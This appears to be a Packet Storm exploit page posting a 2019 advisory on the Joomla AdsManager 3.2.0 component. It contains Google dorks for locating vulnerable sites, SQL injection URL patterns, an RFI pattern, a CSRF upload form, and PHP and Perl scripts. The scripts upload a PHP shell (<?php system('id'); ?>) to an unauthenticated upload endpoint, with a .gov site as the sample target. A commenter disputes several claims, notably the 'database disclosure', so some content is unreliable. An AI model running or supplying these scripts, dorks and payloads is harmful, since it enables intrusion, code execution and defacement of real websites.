what you don't know can hurt you

Joomla AdsManager 3.2.0 CSRF / Database Disclosure / SQL Injection

Joomla AdsManager 3.2.0 CSRF / Database Disclosure / SQL Injection
Posted Feb 21, 2019
Authored by KingSkrupellos

Joomla AdsManager component version 3.2.0 suffers from cross site request forgery, database disclosure, remote file inclusion, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, code execution, sql injection, file inclusion, csrf
MD5 | 5564752e65defdfd7b0020bd14875166

Joomla AdsManager 3.2.0 CSRF / Database Disclosure / SQL Injection

Change Mirror Download
######################################################################################################

# Exploit Title : Joomla AdsManager Components 3.2.0 CSRF / RFI / Backdoor Access / SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/02/2019
# Vendor Homepage : joomprod.com ~ juloa.com
# Software Download Link : joomprod.com/download.html
github.com/amet17/webstar/tree/master/www/administrator/components/com_adsmanager/
# Software Information Link : extensions.joomla.org/extension/adsmanager/
# Software Affected Version : 1.0 ~ 2.5 ~ 2.6 ~ 2.9.13 ~ 3.1.0 - 3.2.0
and all previous versions may vulnerable.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Low / Medium
# Google Dorks : inurl:"/index.php?option=com_adsmanager"
intext:''Productos Software powered by Juloa.com''
intext:''Classifield Ads by AdsManager''
intext:''Designed by Ricky Browne T/as Redesigner.''
intext:''Designed by JoomlArt.com.''
intext:''Joomla Templates Club"
intext:''Aspetto grafico del sito curato da Gianni Marruccella''
intext:''Joomla 1.6 Template by sinci''
intext:''2019 Scuola Windsurf Salerno''
intext:''Powered by Joomla!. valid XHTML and CSS.''
intext:''Copyright (c) 2015 Morningdew Farms. All Rights Reserved."
intext:''Site mis en ligne par NET'MOTIV''
intext:''Copyright (c) 2016 NWPCS - Ontwerp en realisatie: Foppenreclame BV Harderwijk''
intext:''Powered by Fabio Panna Joomla template by SiteGround''
intext:''La Centrale des Annonces est editee par la Sarl Quartz''
More on Google and other Search Engines ......
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

######################################################################################################

# Description about Software :
***************************
AdsManager is the leading classified ads component for Joomla!

Real Estate, Cars, Pets, Electronics, Furniture, etc .....

whatever your classified project is, AdsManager can be configured to fit many needs.

AdsManager provides plenty of options, flexible views and extensions to help you to build your website.

######################################################################################################

# Impact and Consequences :
**************************

* Joomla AdsManager is prone to CSRF - RFI - File Upload and SQL Injection vulnerabilities.

* Joomla AdsManager Components 3.2.0 and other previous versions - component for Joomla is prone to an SQL-injection

vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit

latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application

and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability

may result in unauthorized data manipulation. An attacker can exploit this issue using a browser.

* This Software indicates an attack attempt to perform an Arbitrary File Upload/Shell Upload vulnerability in Joomla Component AdsManager.

The vulnerability is due to a design flaw in the vulnerable application when handling a file upload

request without authentication. A remote attacker may be able to exploit this to execute arbitrary code within

the context of the application, by uploading an arbitrary file without any authentication.

System Compromise: Remote attackers can gain control of vulnerable systems.

* This software is prone to a cross-site request-forgery vulnerability due to insufficient CSRF protection.

An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected application.

Other attacks are also possible. The web application does not, or can not, sufficiently verify whether a

well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

* This Software and its component AdsManager is prone to a remote file-include vulnerability

because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker

to compromise the application and the underlying system; other attacks are also possible.

######################################################################################################

# PHP - PERL - Cross Site Request Forgery - Remote File Inclusion / File Upload / Shell Upload - SQL Injection Exploits :
*********************************************************************************************************
######################################################################################################

# SQL Injection Exploit =>
**************************
/index.php?option=com_adsmanager&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=write_ad&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_all&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_user&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_rules&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_profile&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_ad&adid=[ID-NUMBER]&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[ID-NUMBER]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]

/index.php?option=com_adsmanager&view=details&id=[ID-NUMBER]&ad_tier=[ID-NUMBER]&catid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&format=feed&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php/component/option,com_adsmanager/page,show_category/catid,1/order,0/limit,20/limitstart,0/expand,0/Itemid,30/ => [ SQL Error ]

/index.php?option=com_adsmanager&page=show_category&catid=[ID-NUMBER]&text_search=&order=[ID-NUMBER]&expand=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_user&userid=[ID-NUMBER]&order=[ID-NUMBER]&expand=[ID-NUMBER]&order=[ID-NUMBER]&Itemid=[SQL Injection]

######################################################################################################

# Database Disclosure Exploit =>
*******************************
/administrator/components/com_adsmanager/install.sql

######################################################################################################

Example Vulnerability Errors =>
****************************

Direct Access Exploit =>
***********************
/index.php?option=com_adsmanager&task=upload&tmpl=component

/index.php?option=com_adsmanager&task=upload&tmpl=component&Itemid=[ID-NUMBER]

# Example Vulnerability Errors :
*****************************
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_95"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_100"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_4206"}

Shell Uploaded =>
*******************
{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "SHELLNAMEHERE-CYBERIZM.php"}

# Directory File Path :
*******************

/tmp/plupload/[SHELLNAMEHERE-CYBERIZM.php]

Another Direct Access Exploit =>
*****************************
/index.php?option=com_adsmanager&page=write_ad&catid=3&Itemid=1

/index.php?option=com_adsmanager&page=write_ad&catid=[ID-NUMBER-MAY-DIFFERENT]&Itemid=[ID-NUMBER-MAY-DIFFERENT]

/index.php?option=com_adsmanager&Itemid=694&task=write&catid=71

/index.php?option=com_adsmanager&Itemid=[ID-NUMBER-MAY-DIFFERENT]&task=write&catid=[ID-NUMBER-MAY-DIFFERENT]

Check the Page =>
***************
/index.php?option=com_adsmanager&page=show_all&Itemid=1

# Directory File Path :
*******************
/images/com_adsmanager/ads/[RANDOMNUMBERS-ALPHABET].jpg .gif .png .php;.gif

######################################################################################################

# PHP Exploiter Code [ Proof of Concept PoC ] =>
**********************************************
<?php
$url = "www.[VULNERABLESITEHERE].gov/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@SHELLNAMEHERE-CYBERIZM.jpg",
"name" => "SHELLNAMEHERE-CYBERIZM.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>

######################################################################################################

# Another PHP Exploitation Code [ Proof of Concept PoC ] =>
*******************************************************

*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
function __plus() {
ob_flush();
flush();
}
function __request($params) {
$objcurl = curl_init();
curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/index.php?option=com_adsmanager&task=upload&tmpl=component");
curl_setopt($objcurl, CURLOPT_POST, 1);
curl_setopt($objcurl, CURLOPT_HEADER, 1);
curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
curl_setopt($objcurl, CURLOPT_POSTFIELDS, array("file" => "@SHELLNAMEHERE-CYBERIZM.jpg", "name" => "SHELLNAMEHERE-CYBERIZM.php"));
curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($objcurl, CURLOPT_FOLLOWLOCATION, 1);
$info['corpo'] = curl_exec($objcurl);
$info['server'] = curl_getinfo($objcurl);
curl_close($objcurl);
$gh = get_headers($params['cmd'], 1);
foreach ($gh as $key => $value) {
echo " [INFO][{$key}]:: {$value}\n";
}
$_x = (strstr(($gh[0] . (isset($gh[1]) ? $gh[1] : NULL)), '200'));
echo "--------------------------------------------------------------\n";
print " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : "[-] NOT VULL\n");
if (strstr($info['corpo'], '"tmpfile" : "SHELLNAMEHERE-CYBERIZM.php"')) {
print "\n [INFO][URL][SHELL]:: " . (!empty($_x) ? "[+] {$params['cmd']}" . file_put_contents("Exploit_ArbitraryFileUploadAdsManager_Joomla.txt", "{$params['cmd']}\n\n", FILE_APPEND) : '[-] ERROR!');
print "\n [INFO] Successfully Upload!\n";
}
echo "--------------------------------------------------------------\n";
}
echo "\n [+] Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability By Cyberizm Digital Security Army\n\n";
$params = array('cmd' => "{$argv[1]}/tmp/plupload/SHELLNAMEHERE-CYBERIZM.php", 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n"));
__request($params) . __plus();

######################################################################################################

# Usage of this Exploit =>
************************

# EXECUTE: php exploit.php www.VULNERABLESITE.gov
# OUTPUT: Exploit_AFU_Joomla.txt
# FILE UPLOAD: SHELLNAMEHERE-CYBERIZM.jpg => code shell: <?php system('id'); ?>

# Directory File Path : /tmp/plupload/[SHELLNAMEHERE-CYBERIZM.php]

######################################################################################################

# Another Perl Exploiter Code [ Proof of Concept PoC ] =>
***************************************************
#!/usr/bin/perl

my $ua = LWP::UserAgent->new;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print <<logo;

CYBERIZM DIGITAL SECURITY ARMY

logo

print "\n[-] Joomla AdsManager File Upload/Shell Upload Exploit\n";

print "\nEnter Target URL : ";
my $url=<>;
chomp($url);

my $exploit = "$url/index.php?option=com_adsmanager&task=upload&tmpl=component";

my $response = $ua->post( $exploit, ookie => "", Content_Type => "form-data", Content => [file => ["kingskrupellos.jpg"], name => "kingskrupellos.html"]);

$shell="$url/tmp/plupload/kingskrupellos.html";

$payload = $ua->get("$shell")->content;
if($payload =~/Hacked/)
{
print "\nDeface Uploaded successfully = $shell \n";
}
else {
print "\nTarget Is Not Vulnerable\n";
}

print "\n Back To list or No(Y or N) : ";
my $let=<>;
chomp($let);
if ($let eq "y" or $let eq "Y")
{
local $CWD = '../../../..';
system "perl cyberizm.pl";
}
elsif ($let eq "n" or $let eq "N")
{
system "";
}

######################################################################################################

# Remote File Inclusion Exploit =>
******************************

/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]

######################################################################################################

# Learn PHP Version for AdsManager Exploit =>
*******************************************
/phpinfo.php/index.php?option=com_adsmanager

Example =>

PHP Version 5.1.6
PHP Credits
Configuration
PHP Core
apache2handler
Apache Environment
HTTP Headers Information
PHP Variables
PHP License

######################################################################################################

# CSRF Cross Site Request Forgery Exploiter =>
******************************************

<form method=POST action=http://[VULNERABLESITE].gov/index.php?option=com_adsmanager&task=upload&tmpl=component
enctype=multipart/form-data>
<input type=file name=files[] /><button>Upload</button>
</form>

#####################################################################################################

# Example SQL Database Error =>
*******************************
Warning: include_once(/home/centralexf/www/administrator/components/com_comprofiler/ue_config.php)
[function.include-once]: failed to open stream: No such file or directory in /home/centralexf
/www/components/com_adsmanager/views/edit/tmpl/default.php on line 275

######################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

######################################################################################################

Comments (2)

RSS Feed Subscribe to this comment feed
osvdb

# Database Disclosure Exploit
^ not a vulnerability. just because it is ".sql" doesn't mean you are getting the actual database. this is part of the installation routine.

A lot of these others are suspect for various reasons. Please find someone that will help you write more coherent advisories that demonstrate the vulnerabilities.

Comment by osvdb
2019-02-22 19:25:36 UTC | Permalink | Reply
kingskrupellos

Dear Friend osvdb ;
OK. Yes you are partly right. But it is not wrong. This .sql extension files for database is only installation and uninstallation parts of this Joomla and other CMS's.
And they are mostly Database name - username - password - hostname and various files for Joomla - for example.
Of Course - It is not the actual database. But some websites have the actual database by themselves.
But this database disclosure exploits is only for SQL Files Databases. You misunderstand something.
There are many many examples of Database Disclosures in various platforms like cxsecurity - packetstormsecurity - milw0rm - exploit-db and others....
Impact => An attacker can access information that should normally be inaccessible.
Worst-Case Scenario => An attacker can execute arbitrary commands through malformed SQL injection strings.
This would allow the attacker to set up a backdoor or persistent point of access into your network.
Also, it might be possible to expose confidential customer information or business records by compromising your back-end database.
Causes => Improper input validation is the most common cause of this vulnerability.
You shouldn't give always negative comments. You can e-mail to me. Do not people misguide.
Proof of Concept for Database Topic => IBM CVSS Score for CVSS 3.0 Base Score 5.3 and CVSS 3.0 Temporal Score 4.7
According to the IBM => AdsManager extension for Joomla database information disclosure
AdsManager extension for Joomla could allow a remote attacker to obtain
sensitive information, caused by improper access control for the database files.
By sending a direct request, a remote attacker could exploit this vulnerability to obtain .sql backup files from the database.
exchange.xforce.ibmcloud.com/vulnerabilities/157375
ScreenShot => s2.eksiup.com/13ab4de6c406.png
According to the IBM => AdsManager extension for Joomla SQL Injection =>
CVSS 3.0 Base Score 6.5 - CVSS 3.0 Temporal Score 6.3
AdsManager extension for Joomla is vulnerable to SQL injection. A remote attacker could send specially-crafted
SQL statements to the index.php script using the Itemid, limitstart or catid parameter, which could allow
the attacker to view, add, modify or delete information in the back-end database.
exchange.xforce.ibmcloud.com/vulnerabilities/157376
ScreenShot => s2.eksiup.com/ed9d38db6994.png
AdsManager extension for Joomla cross-site request forgery => CVSS 3.0 Base Score 4.3 => CVSS 3.0 Temporal Score is 3.8.
According to the IBM => AdsManager extension for Joomla is vulnerable to cross-site request forgery, caused
by improper validation of user-supplied input. By persuading an authenticated user to visit a malicious
Web site, a remote attacker could send a malformed HTTP request.
An attacker could exploit this vulnerability to perform cross-site scripting attacks,
Web cache poisoning, and other malicious activities.
exchange.xforce.ibmcloud.com/vulnerabilities/157374
ScreenShot => s2.eksiup.com/b09764f30243.png
Everything has a proof. They are vulnerability because an attacker can access information that should normally be inaccessible.
For example you can see they are only installation - uninstallation sql database files - you can see originally in Joomla site.
docs.joomla.org/How_to_apply_a_.sql_file_to_a_database
joomlashack.com/blog/how-tos/miscellaneous/how-to-export-your-joomla-database-with-phpmyadmin/
astemplates.com/itemdetails.php?id=59&page=howto&article=38
docs.joomla.org/Creating_a_Database_for_Joomla!
Have a nice day.

Comment by kingskrupellos
2019-02-23 22:11:37 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close